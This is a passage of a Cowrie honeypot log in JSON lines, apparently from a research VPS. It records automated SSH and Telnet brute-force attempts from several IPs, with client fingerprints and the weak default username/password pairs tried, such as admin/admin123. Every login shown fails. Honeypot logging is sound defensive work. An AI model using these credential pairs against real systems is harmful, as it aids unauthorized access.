92-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:50:55.969948Z","src_ip":"212.227.125.160","session":"7f98dd6e1972"}
{"eventid":"cowrie.login.failed","username":"flask","password":"flask123","message":"login attempt [flask/flask123] failed","sensor":"my-vps","timestamp":"2025-08-28T00:50:56.209684Z","src_ip":"194.233.79.134","session":"793884308d45"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin123","message":"login attempt [admin/admin123] failed","sensor":"my-vps","timestamp":"2025-08-28T00:50:57.032549Z","src_ip":"171.243.150.245","session":"a37893b42923"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:50:57.863463Z","src_ip":"194.233.79.134","session":"793884308d45"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:50:58.720865Z","src_ip":"171.243.150.245","session":"a37893b42923"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin123","message":"login attempt [admin/admin123] failed","sensor":"my-vps","timestamp":"2025-08-28T00:51:11.544971Z","src_ip":"212.227.125.160","session":"7f98dd6e1972"}
{"eventid":"cowrie.session.closed","duration":"17.1","message":"Connection lost after 17.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:51:12.816412Z","src_ip":"212.227.125.160","session":"7f98dd6e1972"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:51:15.726060Z","src_ip":"212.227.125.160","session":"4695056a5932"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47294,"dst_ip":"1.2.3.4","dst_port":22,"session":"15651960b0a1","protocol":"ssh","message":"New connection: 212.227.125.160:47294 (1.2.3.4:22) [session: 15651960b0a1]","sensor":"my-vps","timestamp":"2025-08-28T00:51:21.356155Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:51:21.718781Z","src_ip":"212.227.125.160","session":"15651960b0a1"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:51:21.831825Z","src_ip":"212.227.125.160","session":"15651960b0a1"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456","message":"login attempt [admin/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T00:51:23.120593Z","src_ip":"212.227.125.160","session":"15651960b0a1"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:51:24.396887Z","src_ip":"212.227.125.160","session":"15651960b0a1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":483,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:51:36.916589Z","src_ip":"176.65.149.186","session":"1a1e9e1d5dc5"}
{"eventid":"cowrie.session.closed","duration":180.06915807724,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:51:36.921725Z","src_ip":"176.65.149.186","session":"1a1e9e1d5dc5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41868,"dst_ip":"1.2.3.4","dst_port":23,"session":"548ee73bae47","protocol":"telnet","message":"New connection: 212.227.125.160:41868 (1.2.3.4:23) [session: 548ee73bae47]","sensor":"my-vps","timestamp":"2025-08-28T00:51:56.760098Z"}
{"eventid":"cowrie.session.closed","duration":12.787608623504639,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:52:09.547602Z","src_ip":"212.227.125.160","session":"548ee73bae47"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":51636,"dst_ip":"1.2.3.4","dst_port":22,"session":"00c01d18de44","protocol":"ssh","message":"New connection: 194.233.79.134:51636 (1.2.3.4:22) [session: 00c01d18de44]","sensor":"my-vps","timestamp":"2025-08-28T00:52:26.382987Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:52:26.442107Z","src_ip":"194.233.79.134","session":"00c01d18de44"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T00:52:27.193252Z","src_ip":"194.233.79.134","session":"00c01d18de44"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"12345678","message":"login attempt [gitlab/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T00:52:29.456734Z","src_ip":"194.233.79.134","session":"00c01d18de44"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:52:30.817470Z","src_ip":"194.233.79.134","session":"00c01d18de44"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.245","src_port":50408,"dst_ip":"1.2.3.4","dst_port":22,"session":"b4994ca0a817","protocol":"ssh","message":"New connection: 171.243.150.245:50408 (1.2.3.4:22) [session: b4994ca0a817]","sensor":"my-vps","timestamp":"2025-08-28T00:52:37.734105Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:52:37.746959Z","src_ip":"171.243.150.245","session":"b4994ca0a817"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:52:37.944828Z","src_ip":"171.243.150.245","session":"b4994ca0a817"}
{"eventid":"cowrie.login.failed","username":"admin","password":"default","message":"login attempt [admin/default] failed","sensor":"my-vps","timestamp":"2025-08-28T00:52:39.550436Z","src_ip":"171.243.150.245","session":"b4994ca0a817"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:52:40.766145Z","src_ip":"171.243.150.245","session":"b4994ca0a817"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55248,"dst_ip":"1.2.3.4","dst_port":22,"session":"35e53baefec8","protocol":"ssh","message":"New connection: 217.72.205.35:55248 (1.2.3.4:22) [session: 35e53baefec8]","sensor":"my-vps","timestamp":"2025-08-28T00:52:54.412395Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:52:54.413487Z","src_ip":"217.72.205.35","session":"35e53baefec8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34616,"dst_ip":"1.2.3.4","dst_port":22,"session":"889c21397173","protocol":"ssh","message":"New connection: 212.227.125.160:34616 (1.2.3.4:22) [session: 889c21397173]","sensor":"my-vps","timestamp":"2025-08-28T00:53:09.606370Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:53:09.626093Z","src_ip":"212.227.125.160","session":"889c21397173"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:53:11.265030Z","src_ip":"212.227.125.160","session":"889c21397173"}
{"eventid":"cowrie.login.failed","username":"user","password":"1234","message":"login attempt [user/1234] failed","sensor":"my-vps","timestamp":"2025-08-28T00:53:23.565339Z","src_ip":"212.227.125.160","session":"889c21397173"}
{"eventid":"cowrie.session.connect","src_ip":"40.76.124.118","src_port":57864,"dst_ip":"1.2.3.4","dst_port":22,"session":"8000c18dc4a3","protocol":"ssh","message":"New connection: 40.76.124.118:57864 (1.2.3.4:22) [session: 8000c18dc4a3]","sensor":"my-vps","timestamp":"2025-08-28T00:53:25.367475Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:53:25.368302Z","src_ip":"40.76.124.118","session":"8000c18dc4a3"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T00:53:25.477469Z","src_ip":"40.76.124.118","session":"8000c18dc4a3"}
{"eventid":"cowrie.session.connect","src_ip":"40.76.124.118","src_port":57872,"dst_ip":"1.2.3.4","dst_port":22,"session":"939c784795a7","protocol":"ssh","message":"New connection: 40.76.124.118:57872 (1.2.3.4:22) [session: 939c784795a7]","sensor":"my-vps","timestamp":"2025-08-28T00:53:25.698143Z"}
{"eventid":"cowrie.client.version","version":"MGLNDD_1.2.3.4_22","message":"Remote SSH version: MGLNDD_1.2.3.4_22","sensor":"my-vps","timestamp":"2025-08-28T00:53:25.699093Z","src_ip":"40.76.124.118","session":"939c784795a7"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:53:25.699838Z","src_ip":"40.76.124.118","session":"939c784795a7"}
{"eventid":"cowrie.session.closed","duration":"16.2","message":"Connection lost after 16.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:53:25.793189Z","src_ip":"212.227.125.160","session":"889c21397173"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45234,"dst_ip":"1.2.3.4","dst_port":22,"session":"a1e4429dedd3","protocol":"ssh","message":"New connection: 212.227.125.160:45234 (1.2.3.4:22) [session: a1e4429dedd3]","sensor":"my-vps","timestamp":"2025-08-28T00:53:34.654606Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:53:35.133306Z","src_ip":"212.227.125.160","session":"a1e4429dedd3"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:53:35.134352Z","src_ip":"212.227.125.160","session":"a1e4429dedd3"}
